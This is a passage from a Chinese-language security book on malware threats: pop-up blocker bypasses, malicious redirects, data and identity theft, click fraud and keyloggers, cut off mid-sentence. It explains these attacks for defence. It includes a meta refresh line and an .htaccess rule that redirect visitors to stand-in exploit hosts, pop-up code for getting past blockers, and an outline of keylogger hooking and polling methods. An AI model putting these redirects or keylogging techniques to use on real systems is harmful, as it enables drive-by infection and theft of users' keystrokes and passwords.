Mozilla浏览器后来改进了弹出窗口拦截程序,只拦截由从网页中装入的基于插件的代码生成的弹出窗口。对于Mozilla浏览器的最大改进是2005年初发布的称为PopupsDie的补丁,这个补丁使Mozilla能够在用户访问网站时阻止基于Flash或者Java的插件动画生成弹出窗口。2004年,Microsoft发布了XP SP2,为Internet Explorer 6添加了弹出窗口拦截功能,从这时起,弹出窗口制作业界在向受害者计算机注入弹出窗口时遇到了很大的问题。但是在今天,我们面对着弹出窗口方法的最新浪潮,其目标是攻击和传染受害者的PC,然后使用恶意软件作为向受害者的浏览器注入更多弹出窗口的方法。 弹出窗口威胁 来自弹出窗口的威胁由“单击”因素决定;连我母亲都上过当。一些弹出窗口使用精心制作的消息,向用户施展社会工程,使用户单击或者将鼠标移到窗口的任何部分,这会启动许多操作。一些更加狡猾的弹出窗口甚至在用户单击右上角的“×”以关闭窗口时启动程序。下面是一个你可能会遇到的弹出式广告实例。 警告:我们已经发现你的PC被间谍软件感染!间谍软件一般会记录你的互联网活动,如电子邮件密码、即时消息、网上银行业务、聊天室、约会网站/成人网站和其他你访问的网站。一旦安装到你的PC上,间谍软件将你的个人信息传到第三方—未经你的允许。为了扫描PC上的间谍软件,下载一个免费的扫描程序—单击这里! 识别弹出窗口拦截程序 下面是一个简单的函数,你可以运行它来验证主机上弹出窗口拦截程序的存在,或者测试你自己的弹出窗口拦截程序的能力: function DetectBlocker(){ var oWin=window.open("","detectblocker","width=100,height=100, top=5000,left=5000"); if(oWin==null||typeof(oWin)=="undefined"){ return true; }else{ oWin.close(); return false; } } 绕过弹出式窗口拦截程序 不法的广告商不断地寻找避开弹出窗口限制的方法。一些弹出式广告使用Adobe Flash来生成,利用这种方法,弹出式窗口不会被发现,因为没有新的弹出窗口生成,广告将在当前窗口中运行。2.1.1节中的代码是可以用于避开弹出窗口拦截程序的许多方法之一。拦截程序的版本很多,本书无法一一提及,为了举例,我们将关注于用来避开你的弹出窗口拦截程序的方法。 使用HTML的弹出窗口 HTML弹出窗口没有效果,因为弹出窗口拦截程序能够轻易地识别网页中嵌入的HTML语句,如: <a href="htmlpage.htm"target="_blank">a link to your pop-up</a> 正如你所看到的,任何安全程序都将很快地识别这段代码,并且不允许这个链接打开,除非你按下CTRL-C和/或在你的安全设置允许弹出窗口的网站上。 使用JavaScript的弹出窗口 使用JavaScript,你可以在动画中嵌入弹出窗口,这在以前比HTML更难以发现,但是现在已经不难发现了。如果你仔细察看下面的代码片断,就会看到有不同的生成弹出窗口的方法,但是同样,如果存在一个弹出窗口拦截程序,你就达不到目的。 实例A function launch(){ target="/xyz/xyz" y=window.open(target,"newwin","scrollbars=yes, status=yes,menubar=no,resizable=yes"); y.focus; } 实例B Function openPop(u){ newWindow=window.open(u,'popup','height=540,width=790,toolbar=no, scrollbars=no'); } 使用Flash的弹出窗口JavaScript可以通过Flash动画传递,但是使用Flash,你还可以使用ActionScript来创建一个弹出窗口: Import flash.external.ExternalInterface; Function myFunc():Void var url:String="http://www.popup.net"; var windowName:String="mywindow"; var windowOptions:String="width:800,height:800"; ExternalInterface.call("window.open",url,windowName,windowOptions); 弹出窗口对策 大部分现代的浏览器带有弹出窗口拦截工具,第三方的工具则包含了其他功能,例如广告过滤。 弹出窗口拦截许多网站在不扰乱当前窗口的情况下使用弹出窗口显示信息。例如,如果你打算在网页上填写一个表单且需要额外的指导,弹出窗口可以为你提供指南,这样你就不会丢失已经输入到表单的信息。 一些基于Web的应用程序安装程序使用弹出式窗口来安装软件,例如Adobe Flash Player的安装程序。一定要了解要求你安装的是什么,黑客可能包含一个基于Web的软件安装,看上去似乎是合法的,但是实际上却是一个恶意软件,这个软件合法地安装在你的计算机上后,会将你的计算机开放给其他的下载程序和弹出窗口。 许多互联网浏览器中,在单击链接的同时按下Ctrl键能使你绕过弹出窗口拦截程序。虽然实际上现在的浏览器都有弹出窗口拦截程序,但是它们的功能各有不同。由于大的浏览器厂商有更多的研究和开发预算,它们的产品更能够跟上攻击者的注入方法。你还可以自定义每种弹出窗口拦截程序来满足你的需求。 2.1.2 搜索引擎重定向 网站管理员或者开发人员在网站中使用重定向有多种原因。让我们从管理和恶意软件的角度来快速地看看这些原因,以便更好地理解让管理员更轻松的简单功能是如何同时被进一步的犯罪活动利用的。 类似的域名 网站访问者经常错误地输入URL,例如,gooogle.com或者googel.com。有网站的组织常常会列出这些错误拼写的域名并且将访问者重定向到正确的位置,比如上例中的google.com。还有,Web地址example.com和example.net也可以被重定向到一个域或者网页(如example.org)。这种方法常常被用于“保留”相同的名称的顶级域名(TLD),或者使一个真实的.edu或者.net更容易重定向到容易识别的.com域名。 将一个网站移动到新的域 为什么要重定向一个网页? ·网站可能需要修改域名。 ·网站创作者可能将网页转移到一个新域。 ·两个网站可能合并。 使用URL重定向,指向旧URL的输入链接将被发送到正确的位置,例如,如果你转移到一个新的域名提供商,并且需要将访问者从你的旧服务器转到新的服务器。有很多合法的URL重定向,但是根据本书的宗旨,我们会介绍攻击者可能使用URL重定向来感染你的系统的恶毒方法。 恶意的重定向可能来自于尚未了解到变化的网站,或者来自于已经允许域名注册过期,而犯罪组织购买了该域名的旧网站;没有产生怀疑的用户单击浏览器收藏夹中的书签到达这些网站。对于搜索引擎也一样,搜索引擎常常在数据库中保留旧的域名和链接并且将搜索用户送到这些旧的URL。当网站使用一个指向新的URL的永久转移重定向,访问者几乎总能到达正确的页面。而且,在下一次搜索时,搜索引擎可能会发现并且使用更新的URL。但是,攻击者利用了这些旧的信息。现在由于搜索引擎的网站索引更加可靠,这种利用也变得更难了。 重定向的主要问题是,攻击者可以诱惑访问者到一个已知网站副本,而这个副本装入时具有多个注入点,访问者一旦单击就会被恶意软件所感染。现在恶意软件使用的URL重定向范围很广且数量很多,主要用于牟取金钱利益。如果你在互联网上搜索,将会发现在数千个论坛中,用户抱怨恶意软件将不明真相的受害者重定向到按单击付费的网站,如色情网站和/或其他黑客按照单击得到网站所有者付费的共享软件网站。恶意软件一旦安装到受害主机上,一般会生成多个弹出窗口并且将受害者当前打开的浏览器重定向到受害者访问时会付费给黑客的网站,以及/或者提供散布更多的恶意软件的手段——这与所谓的drive-by download相似。下图是drive-by download的一个例子,drive-by download发生在受害者访问一个网站并且被要求安装新软件时,这个软件可能来自于一个集团公司,但是它引入了额外的后台下载或者恶意软件,从而安装或者执行任何被事先授意(或者预先安排)的应用程序。 记录出站链接 几乎所有Web服务器的访问日志都保留一定水平的访问者信息——他们来自哪里以及如何访问该网站。这些服务器一般不记录关于访问者如何离开网站的信息。这是因为访问者的浏览器在单击出站URL链接的时候不需要与原来的服务器通信;但是这种信息可以以多种方式捕捉到。 第一种捕捉的方式涉及URL重定向。除了将客户直接发送到第二个网站之外,链接还可以指向第一个网站域上的一个自动重定向到原始目标的URL。这种请求在服务器日志中留下了跟踪信息,指明了下一个链接。这种方法可以用来发现下一个被访问的网站,以便计划对这些网站的攻击。如果你的目标是收集个人或者集团的信息,就可以使用这种方法来指导他们访问的是你的站点还是你所控制的站点。这种方法的缺点是给每个指向原始网站服务器的请求增加了一些延迟。 从攻击者的角度看,配置你的网络来监视或者记录所有出站的HTTP和HTTPS网站活动是很聪明的。从安全分析的角度看,这种配置在调查恶意软件爆发时特别有帮助;你必须在被感染的机器试图更新代码库或者升级到另一个级别的特洛伊木马之前尽快地识别出来。由于黑客攻击网络具有比过去更高的精确度和技能水平,系统上的恶意软件的更新也就变得越来越快了。 对付搜索引擎 攻击者也可能修改搜索引擎所用的元数据,以便捕捉更多搜索具体的词语而不知道如何正确地搜索互联网和/或识别有效网站的受害者。重定向技术已被用于诱骗网站访问者多年了,例如在网站的index meta name content或者keywords段的误导信息可以非法用于诱骗受害者或者对其进行社会工程,使其访问该网站以便进行在客户浏览器上的攻击、启动一次drive-by download,或者试图仿冒受害者的信息。这种方法可以改变搜索引擎查询的结果,从而将受害者诱骗到这个网站上来。 重定向还被用于“窃取”流行网页的排名,并且将其用于不同的用途,一般包括状态代码302 HTTP或者Moved Temporarily(临时移除)。 搜索引擎提供商发现这个问题并且已经在采取合适的措施来保护用户。一般来说采用这种技术来控制搜索引擎的网站在搜索引擎公司发现这种欺诈行为之后会得到惩罚,它们的排名会被降低或者被排除在搜索引擎索引之外。 操纵访问者 URL重定向有时候用于仿冒攻击,使用户混淆他们正在访问的网站。这种类型的威胁也能很快地把访问者带到存储恶意代码的网站,而不是一开始受害者所看到的良性网站。 重定向技术和攻击 攻击者可以使用多种技术将访问者重定向到他们的网站。首先我们介绍可用的管理功能,然后将讨论这些功能如何用于邪恶的目的。 刷新元标记 在许多情况下,使用刷新元标记(refresh meta tag)是重定向访问者的最简单方法。下面是一个简单的标记,说明了管理员为了刷新网站上的信息所做的典型工作。大部分新闻机构使用这种方法确保在网站上停留较长时间的访问者能看到及时更新的内容。在定义好的一段时间之后,浏览器刷新并且显示新添加的内容。看看这些基本的HTML标记,你可以看到浏览器在600秒之后被刷新。 <meta http-equiv="refresh"content="600"> 现在如果你使用相同的HTML代码行,加上一个额外的推送地址,就能在不生成弹出窗口的情况下将用户重定向到另一个网站。在不引起怀疑的情况下,攻击者能在访问者查看完计划中的网站之后简单地转发到一个邪恶的网站,只要像下面这样重写refresh标记就可以了: <meta http-equiv="refresh"content="120; url=http://pwpwpw123123.net/expl01t"> refresh标记中的唯一不同是几个额外的HTML标记。现在每当访问者浏览这个网站,过一会儿,他就会被重定向到一个装入客户端基于浏览器的攻击和/或按单击收费的网站。如果快速地使用这个功能,使得用户来不及按下浏览器的后退按钮,就会使用户很快地认为,这个网站是合法的,而不是一个在后台运行恶意软件的邪恶网站。 手工重定向 最简单的技术是要求访问者单击一个指向新网页的链接,通常使用如下的HTML链接锚: Click here to new page<a href="http://hackedlink.net/">link</a> 多半,恶意网站都链接在一起。例如,专业的电影盗版网站和/或非法的破解软件网站一般会链接到色情网站,反之亦然,它们互相支持,如同相互依赖的共生体。一般来说,大部分健壮的防病毒引擎或者防间谍软件网站将会在访问者单击时发现恶意网站,然后阻塞该网站和/或向访问者提出警告。但是,多数时候是访问者没有得到通知、恶意软件没有被发现,访问者的计算机系统却不知不觉地受到了感染。 HTTP 3xx状态代码 因为万维网使用HTTP协议,来自Web服务器的带有3xx状态代码的响应也可以作为引导访问者到其他位置的重定向。 HTTP标准为URL重定向定义了多种状态代码: ·300多重选择(例如,提供不同的语言) ·301永久移除 ·302找到(例如,临时重定向) ·303发现其他(例如,CGI脚本结果) ·307临时重定向 注意:这些状态代码以HTTP响应的Location:header中给出的URL作为重定向的目标。300多重选择代码通常在消息体中显示所有选择并且在Location:header中说明默认的选择。 在3xx的范围中,也有和以上代码有显著不同的状态代码(这里不作讨论): ·304未修改 ·305使用代理 下面是一个使用301永久移除重定向的标准HTTP响应的例子: HTTP/1.1 301 Moved Permanently Location:http://www.example.org/ Content-Type:text/html Content-Length:174 <html> <head> <title>Moved</title> </head> <body> <h1>Moved</h1> <p>This page has moved to<a href="http://www.example.org/">http://www .example.org/</a>.</p> </body> </html> 使用服务器端脚本进行重定向 Web创作者常常没有生成这些状态代码的权限:HTTP报头由Web服务器应用程序(server applet)生成,并且不是从用于该URL的文件中翻译而来。即使对于CGI脚本,Web服务器通常也会自动创建状态代码并且允许脚本添加自定义的报头到页面上。要用CGI脚本创建状态代码,必须启用未解析报头(nonpased header)。 有时候,由一个标准的CGI脚本打印“Location:URL”报头行就足够了。许多Web服务器为这样的应答选择一个3xx状态代码。HTTP协议要求这种转发完全自行发送,没有任何网页信息。结果,使用脚本语言将用户浏览器重定向到其他页面的Web开发人员必须确保这个重定向是响应的第一个或者唯一部分。在ASP脚本语言中,这也可以使用方法response.buffer=true和response.redirect“http://www.example.com”来完成。使用PHP时,你可以使用header("Location:http://www.example.com")。 按照HTTP标准,Location报头必须有一个绝对URL。当从一个页面重定向到同一个网站的另一个页面时,使用相对URL是一个常见的错误。结果是,大部分浏览器允许Location报头中的相对URL,但是一些浏览器生成一个显示给最终用户的警告。 使用.htaccess进行重定向 使用Apache Web服务器时,可以使用针对目录的.htaccess文件(还有Apache的主配置文件)。例如,为了重定向到一个页面,使用下列代码: Redirect 301/old.html http://www.malicious2u.net/new.html 为了改变域名,使用下列代码: RewriteEngine On RewriteCond%{HTTP_HOST}^.*oldwebsite\.com$[NC] RewriteRule^(.*)$http://www.preferredwebsite.net/$1[R=301,L] 当把.htaccess用于这种目的时,通常不要求具备管理员权限;而如果需要这种权限,这些设置可能被禁用。当你有权访问Apache主配置文件(http.conf)时,最好避免使用.htaccess文件。 刷新元标记和HTTP刷新报头 Netscape引入了一种通常被称为元刷新(meta-refresh)的功能,在定义的一段时间之后刷新显示页面。使用这种功能,可以指向新页面的URL,从而切换到另一个页面或者刷新在该页面上找到的某些形式的内容。下面是可用的元刷新选项类型: ·HTML<meta>标记 ·动态文档考察 ·专有扩展(proprietary extensions) 超时值为0秒表示立即重定向。 下面是一个使用这种技术的简单HTML文档实例: <html><head> <meta http-equiv="Refresh"content="0;url=http://www.example.com/"> </head><body> <p>Please follow<a href="http://www.example.com/">link</a>!</p> </body></html> 这种技术对所有Web创作者都起作用,因为meta标记包含在文档本身之中。·meta标记必须放在HTML文件的head段。 ·这个实例使用的变量0可以替换为另一个变量以得到一个延迟(以秒计算)。许多用户觉得这种延迟令人烦恼,除非有充足的原因。 ·这是Netscape添加的非标准功能,大部分Web浏览器都支持。 下面是通过发出HTTP刷新报头达到相同效果的一个实例: HTTP/1.1 200 ok Refresh:0;url=http://www.example.com/ Content-type:text/html Content-length:78 Please follow<a href="http://www.example.com/">link</a>! 这个响应对于CGI程序来说更容易生成,因为不需要修改默认的状态代码。下面是模拟这种重定向的一个简单CGI程序: #!/usr/bin/perl print"Refresh:0;url=http://www.example.com/\r\n"; print"Content-type:text/html\r\n"; print"\r\n"; print"Please follow<a href=\"http://www.example.com/\">link</a>!" JavaScript重定向 JavaScript提供多种方法来在当前浏览器窗口中显示不同的页面,这些方法相当多地用在重定向上。但是,用HTTP报头或者刷新原标记(尽可能地)替换JavaScript有很多理由: ·安全考虑。 ·有些浏览器不支持JavaScript。 ·许多网络爬虫(例如来自搜索引擎的)不执行JavaScript。 注意:搜索“你将被重定向”将会发现几乎每个JavaScript重定向采用的都是不同的方法。这使得Web客户端开发人员在没有实现JavaScript中的所有模块的情况下难以对你的重定向请求表示尊敬。 框架重定向 创建一个包含目标页面的HTML框架(frame)能够取得稍微不同的效果: <frameset rows="100%"> <frame src="http://www.example.com/"> </frameset> <noframes> <body>Please follow<a href="http://www.example.com/">link</a>!</body> </noframes> 这种重定向方法的一个主要不同是对于框架重定向,浏览器在URL栏中显示框架文档的URL,而不是目标网页的URL。这种技术通常被称为伪装(cloaking),可以用于使读者看到更可信的URL,或者出于欺骗的目的,作为网站欺诈的一部分来隐藏仿冒的网站。 重定向循环 一个重定向很可能引起另一个重定向。例如,URL http://www.example.com/URL_redirection(注意域名中的不同)首先被重定向到http://ww1.example.com/URL_redirection,然后再被重定向到正确的URL:http://test.example.com/URL_redirection。这样做是恰当的,因为第一次重定向更正了错误的域名,下一个重定向选择了正确的语言部分。最后,浏览器显示源网页。但是有时候,Web的一个错误可能导致重定向回到第一个页面,引起永不结束的重定向循环。浏览器一般在几次之后停止这一循环并且显示一个错误信息。 2.1.3 数据盗窃 数据盗窃是处于上升趋势的一个问题,主要是具有网络资源(例如,桌面计算机和闪存盘、iPod这样的手持设备,甚至能够存储数码信息的数码相机)访问权的办公室工作人员所为。所有这些设备一般都保存着大量公司专有信息,这些信息通常由网络和安全管理员管理。因为员工常常花费大量的时间来开发公司的联络人、机密以及受到版权保护的信息,他们往往会觉得自己对这些信息有某种权力。他们普遍也有可能在离开公司时复制或者删除部分信息,或者在仍被雇用的时候将这些信息用在不正当的方面。 有些员工将会带走像联络人这样的信息,并且利用它们为自己牟利或者用于私下交易。我们在私下曾经多次看到销售人员用这种方法来得到额外的收入。销售人员复制一份联络人信息数据库,将它用于下一份工作是常常发生的事情,这很明显是违反雇佣条款的行为。尽管大部分的组织实现了防火墙以及入侵检测系统,但是很少考虑来自普通员工的危险,他们常常将专有数据复制到自己的工作计算机、移动设备,某些时候还可能在他们的家庭计算机上被用于私利或者为其他公司所用。考虑到当今的技术和员工的能力,可以在很短的时间里通过电子邮件、网页、USB设备、DVD存储和其他手持设备传递很大的文件,数据盗窃造成的损失可能无法估量。 在对付恶意软件的时候,也可能发生同样的事情,而且甚至与你的组织中的员工没有联系。很多时候,员工甚至可能有意在组织中启动恶意软件,作为窃取数据的手段,甚至只是为了泄愤而感染组织的网络。恶意软件感染可能通过使用可移动媒体设备或者直接互联网传输发生。随着具有硬盘般容量的可移动设备越来越小,快速的盗窃行为(如podslurping)变得越来越常见。podslurping是指某人从一台PC中轻易地提取你的iPod信息,将你所订购的音乐窃为己用的行为。 现在存储1TB数据的设备可以放进一个员工的口袋里,这些数据可能使公司垮台。恶意软件甚至被编写出来感染公司或者个人的移动设备,用于窃取信息或者使恶意软件能够感染用户的个人计算机,以图通过网络传播到其他设备来达到各种目的。 移动设备恶意软件 既然整个公司和专门制造业都与信息技术相关,也就出现了专门为移动设备开发、用以窃取公司信息的恶意软件。表2-1详细列出了一些在最近几个月中出现的编写设备恶意软件的例子。其中一些恶意软件除了破坏设备之外没有别的害处,而其他恶意软件会从你的移动设备窃取数据,并且将其发送给黑客,或者在移动设备被插入到连接装置时通过网络系统传播。 2.1.4 单击欺诈 单击欺诈是互联网犯罪的一种形式,发生在按单击付费的在线广告中,一个人、脚本或者计算机程序模仿一个系统的Web浏览器的实际用户单击广告,以产生受害人所不知晓的收入。犯罪分子所单击以赚取利润的实际广告几乎都是受害人所不感兴趣的。单击欺诈是一些辩论和越来越多诉讼的主题,因为广告网络从无辜的消费者受到的欺诈中获利。 按单击付费广告 按单击付费广告(Pay-per-click advertising,PPC advertising)是一种广告方案,网站管理员作为出版商,显示来自广告商的可单击链接,按照单击数量收费。当今最大的广告网络是Google的AdWords/AdSense和Yahoo!Search Marketing。这两个公司都具有双重角色,因为它们也是(自己的搜索引擎上)互联网内容的发布者。这种大公司具备双重角色的情况可能导致利益冲突,例如,对于未察觉到的单击欺诈,Google和Yahoo!在付费给广告商时损失了金钱,但是当它们定期从广告商那里收费时却赚取了更多的钱。由于Google或者Yahoo!从广告商那里收取的费用和付出费用之间的差异,它们直接而无形地从单击欺诈中获利。 单击欺诈威胁 这种单击欺诈类型是以不属于按单击收费广告协议当事人的非缔约方作为基础的。协议各方之间责任的缺失可能在按单击收费广告过程中引入犯罪因素。以下是非缔约方的一些例子: ·广告商竞争 有些团体可能希望通过单击竞争者的广告来给竞争对手造成损害。这不可避免地迫使广告商为不相关的单击(而不是客户驱动的)付费。 ·出版商竞争 这些团体可能希望陷害特定的内容出版商,以便驱使广告商使用自己的内容出版公司。当这种情况发生时,邪恶的出版商造成别的内容出版商比客户更多地单击广告的假象,广告商可能因此决定结束与这些内容出版商的合作关系。许多出版商的收入来源只依靠广告,这样的攻击可能使其破产。 ·恶意目的 和破坏公物或者网络恐怖分子一样,对广告商或者出版商造成危害有许多动机,甚至是没有任何财务收益的人。这些动机可能包括政治的、个人的甚至基于集团公司的怨恨。这些情况往往最难以识别,因为识别甚至追查罪犯很困难,即使找到了罪犯,也几乎无法进行诉讼,因为互联网允许很多匿名的活动。 2.1.5 身份盗窃 身份盗窃可以用于支持包括非法移民、恐怖主义、毒品买卖、间谍、勒索、信用欺诈以及医疗保险欺诈等犯罪行为。某些人可能因为非财务的原因而企图假冒别人,比如为了受害者的成就所得到的赞扬和名誉。与恶意软件一同使用,身份盗窃可以取得你的互联网身份以便访问你的网上账户。这些账户可能包括你的电子邮件账户——你的ISP和Webmail账户——PayPal、eBay、MySpace、Facebook、Livejournal、银行账户,以及其他个人网上账户。 攻击者可以使用所有这些窃取来的信息假扮成受害人,以窃取个人信息、金钱或者其他物品。最终,通过窃取你的网上身份,黑客可以用这种假象将恶意软件散布到你的朋友和亲属那里。在下几个小节中,我们将简短地介绍一些身份盗窃的类型,使你更好地理解它们。本小节中,我们将讨论各种形式的身份盗窃。首先,来看看下面这些图表中所显示的国际上身份盗窃类型和窃取或者诈骗得来的信息的使用方法的平均比率。 财务身份盗窃 这种类型的欺诈通常涉及受害者的银行账户和/或个人信息,犯罪分子可以使用现有的或者开立新的信用或者账户额度。在这个过程中犯罪分子通过提供受害者的准确姓名、地址、生日或者验证身份所必需的其他个人信息来假冒受害者。这种类型的身份盗窃现在十分普遍,你的朋友中可能有1/5曾经遭遇过这种欺诈。 刑事身份盗窃 这种类型的身份盗窃发生在犯罪分子使用你的身份进行犯罪活动时,万一被警察或者组织的安全团队抓获,你的证件将被用来转移犯罪分子及其活动的嫌疑。如果所犯的是个小过错,除非发生在本州范围内,否则这些人绝不会知道自己已经成为了这种盗窃的受害者,但是更严重的过错可能导致他们被捕。这是可能导致身份盗窃和仿冒的个人信息的又一个例子。 身份盗窃攻击 几乎在所有情况下,犯罪分子必须掌握某个人的个人可辨识信息(personally identifiable information,PII)或者文档,以便在生活中或者互联网上假冒他,犯罪分子通过下列手段达到这个目的: ·窃取信件或者在垃圾堆中翻找含有个人信息的废纸(拾荒)。几年以前,我的一位工作于美国政府情报署的邻居的垃圾桶在半夜被一群讲外国话的家伙翻找了一遍,所以要知道你所丢掉的是什么。这也适用于你的计算机的回收站中的已删除项目和/或留在“我的文档”文件夹或者/home/use/%name%目录的旧文件。 ·研究政府登记、互联网搜索引擎或者公共记录搜索服务中关于受害者的信息。 ·使用你自己安装的程序窃取个人或者账户信息,以便登录到可收集到更多信息的厂商网站。 ·安装击键记录程序窃听你的键盘输入,以便窃取个人信息、密码、朋友的信息、教育状况,或者能够取得个人数据的专业交易。 ·从受害者工作场所的公司计算机数据库窃取个人信息。攻击者可以使用恶意软件进行这项工作(特洛伊木马,破解)。 ·虚假的职务提供信息通知(全职或者在家工作),使受害者天真地回复全名、地址、履历、电话号码、银行详细信息或者安全许可等级。 ·通过在电子邮件中假冒一个受到信任的机构,例如一家公司、学校或者组织,对受害者进行社会工程以诱骗其打开附件,从而向受害者的计算机注入恶意软件,导致个人信息的盗窃。 ·利用受害者的社交网络(MySpace、Facebook、Bebo、LinkedIN、Livejournal)来了解受害者的更多详细信息,还可能利用受害者的亲友来散布/传播恶意软件和窃取更多的身份。 ·改变你的电子邮件地址,从而将账户更新、账单或者账户报告转移到另一个位置,以得到常用账户信息或者推迟身份盗窃被发现的时间。 个人身份盗窃对策 对于所有受害者来说,最困难的是在发生身份盗窃时清除记录。对于某些人来说,即使清除信用评级也将花费几个月甚至几年的时间。但是,知道这一切是如何发生的将带给你一些重要的思路,以保护自己和降低你暴露在这种威胁下的程度。犯罪分子将会做任何便于窃取你的身份以完成其“宏伟计划”所需的事情。对于基于恶意软件的威胁,你最起码要知道你所访问的网站以及网站上所显示的内容。 ·这是供许多人报告问题的非常流行的网站吗? ·这个网站是否有可疑的名称,例如与www.paypal.com相似的www.pay.pal.com。 ·在你单击之前了解单击的是什么。 ·在开始输入个人信息之前了解网站。 ·了解你从互联网下载和/或安装的内容: ·这是来自受尊重的网站的著名程序吗? ·这是来自一个可疑网站的著名程序吗? ·安装程序后,在你的PC上有没有发生什么奇怪的事情? 获得个人身份通过严重地破坏隐私而成为可能。对于用户来说,这主要是因为轻信而向别人提供信息。在某些情况下,犯罪分子通过实物盗窃、社会工程或者基于恶意软件的数据盗窃取得文档或者个人身份。保护你的计算机上的个人信息对于防止身份盗窃是很关键的,这可以用很多方法实现,如果将这些方法都列出来,你会对如此之多的选项感到惊讶。但是,因为这是对策的部分,我们将仅仅介绍其中的一部分,以便为你提供一些最佳的建议。始终要记住一点,安全保护越强大,你就越可能防止身份盗窃。如果你确实被恶意软件感染,它已经在你的计算机上运行,那么只有如下这些安全措施能够保护你: ·三因素身份认证 使用三部分的身份认证过程,包括一个用户名(你是谁),一个密码(你所知道的某件事情),以及一个安全ID或者安全令牌(你所拥有的某个东西)。这种方法现在提供给了暴雪娱乐公司的《魔兽世界》的玩家(我的名字是“Go Alliance,Die Horde”),它被称为暴雪密码保护器(Blizzard Authenticator),使用每30秒变化一次的6位数字。没有这个令牌,窃取魔兽的账户是不可能的。这种方法也适用于使用SecureComputing或RSA SecurID令牌的大公司。 ·计算机身份认证系统 例如,Pretty Good Privacy(PGP,汉语意思为:相当好的隐私)或者GNU隐私保护(GNU Privacy Guard,GPG)要求用户在每次传送以及/或者提供常规的个人信息时进行验证,以持续地工作于安全文档之上。这些程序还提供了能够抵御一些类型的恶意软件的保护空间。 ·脱机安全数据存储 将你的数据转移到安全的脱机可移动设备上,仅在使用这些数据时将设备插入系统,这种方法是有帮助的,虽然这种方法不完美,但是在容易被恶意软件或者黑客访问的计算机上存储的个人信息越少越好。 ·密码锁 这种服务在互联网上到处都有提供,作为一种单点登录(single-sign-on,SSO)的手段,或者付费安全地存储你的所有密码,使其不会在计算机上缓存中或者写在存储于PC或者桌面上的文件中。绝不要像某些人那样,将你的用户名/密码、信用卡/有效期/信用卡验证码以及社会保险号码/出生日期存储在Microsoft Outlook上的记事本中——这是不聪明的做法,这么做的人比想象的要多。 2.1.6 击键记录 在这个小节中,我们将讨论击键记录程序的功能和用这些程序所能收集到的信息,以及这些信息如何用于从主机上窃取信息。为了契合本书的主题,我们将专注于基于恶意软件的击键记录功能。但是,注意其他类型的击键记录也很重要,因为一台计算机受到感染,通过使用它的红外端口、麦克风和/或无线接口,可以抽取在受感染机器同一范围内的其他机器的击键。大部分这种信息可以看做是本书第二部分中Rootkit有关章节的开篇或者概述,在第二部分中将详细讨论用户和内核模式钩子技术和Rootkit的内部工作机制。 本地机器软件击键记录程序 这些程序是试图工作于目标计算机操作系统上的软件。从技术的角度看,有3种类型的软件击键记录程序。 基于内核 这种方法是最难以编写同时也是最难以对付的。这种击键记录程序存在于内核级别,因此实际上不可见。它们几乎总是在暗中破坏OS内核,并且得到对硬件的未经许可访问权,这使它们非常强大。例如,使用这种技术的击键记录程序可以像键盘驱动程序一样工作,从而在键盘上输入的信息发送给OS的时候进行捕捉。 基于Windows:GetMessage/PeekMessage 你可以尝试直接与这些API挂钩,以捕获WM_CHAR信息。WM_CHAR消息由键盘在TranslateMessage函数翻译WM_KEYDOWN消息时发送到一个窗口。GetMessage()和PeekMessage()函数都用于在Windows消息队列中的进出,消息队列与键盘输入相连。这些函数都与GDI函数相关,在user32.dll中定义,user32.dll调用ntdll.dll,之后再传递给W32k.sys,而W32k.sys位于与用户空间相对的内核空间中。所以,如果企图获得内核访问权以进行击键记录,这是一种可用的方法。 基于Linux Sebek是一个广为人知的白帽输入记录工具,运行于多种版本的Linux内核之上。这是一个核心补丁,本来是开发用来捕捉蜜罐和入侵者之间交互的。第4章中将更深入地讨论这个工具,简单地说,它被配置以捕捉来自系统调用的读写活动。 基于钩子 击键记录程序与OS提供的键盘API挂钩。使用钩子的问题是系统响应时间的增加可能降低整个系统的性能。所以,简而言之,通过内核直接操作要高效得多。但是,因为大部分恶意软件利用钩子,所以我们也将作一些介绍。 ·WH_JOURNALPLAYBACK 这个钩子为应用程序提供在系统队列中插入消息的能力。当你希望回放从鼠标或者键盘捕捉到的多个事件序列时,使用WH_JOURNALRECORD。 ·WH_JOURNALRECORD这 个钩子为应用程序提供记录和监控多种输入事件的能力。你可以使用这个钩子来记录和存储来自整个系统的信息,然后使用WH_JOURNAL PLAYBACK来分析数据输入。 ·WH_KEYBOARD 这个钩子使应用程序能够监控直接来自键盘的原始消息流量,键盘消息由GetMessage或者PeekMessage函数返回。 ·WH_MOUSE_LL和WH_MOUSE 这些钩子都与捕捉和回放消息队列中的鼠标输入事件相关。 独特的方法 这里,黑客使用类似GetAsyncKeyState和GetForegroundWindow这样的函数记录关于哪个窗口拥有焦点以及键盘上每个键的状态的信息,告诉黑客什么信息正在被输入哪个窗口。从实现的角度看,这种方法比较简单,但是这要求每个键的状态每秒钟被轮询多次,这显然导致了CPU的高使用率,并且可能因为数据进程可能不时被锁定而丢失一些击键。但是,熟练的编程人员能够克服这些限制,轻易地每秒轮询键盘状态数百次,并且不会显著地增加CPU的使用。 远程访问软件击键记录程序 这种程序是为本地软件击键记录程序配置了附加的特性,能够广播从目标计算机记录到的数据,使这些数据可以从远程监控到。一般来说,这些信息通过FTP、电子邮件、硬件设备发送,犯罪分子也可能登录到受害者的计算机查看预先配置好的击键记录程序收集的任何数据。 恶意软件发布者可以设计隐蔽信道来登录到击键记录应用程序,或者向击键记录程序提供将捕捉的数据发送给发布者的隐蔽方法。还有其他多种类型的键盘记录程序,但是我们不打算加以介绍,因为它们超出了本书的范围。 击键记录程序攻击:电子邮件击垮两位主持人——击键记录程序是幕后推手 未经许可的人侵犯你的个人和公司隐私可能是毁灭性的。当犯罪分子访问到你的个人或者公司信息时,可能导致许多你不愿意看到的灾难。下面我们来看看2008年末公布的对新闻工作者的攻击。 关于这个事件有很多文章报道,这里只提供一个梗概。一位资深的电视播音员被控告非法访问前合作主持人的电子邮件账户,她显然知道个人详细情况被泄露给搬弄是非的专栏作家,这最终导致她被开除出新闻台。根据各种文章报道,黑客在她的电子邮件中使用了基于硬件的击键记录程序,这个程序秘密地存储所有她输入到系统的击键,包括个人信息,最重要的是还有公司和私人电子邮件账户的密码。 击键记录程序对策 软件击键记录程序 目前,没有简单的防止击键记录的方法。未来,具备安全I/O的软件也许能防止击键记录程序,在此之前,最好的计划是使用常识并组合使用多种方法。使用软件跟踪键盘的连接性并且记录其不存在的情况可以作为对抗物理击键记录程序的措施。这种方法在PC几乎始终开启的情况下有意义。 代码签名(code signing) Windows Vista和Windows Server 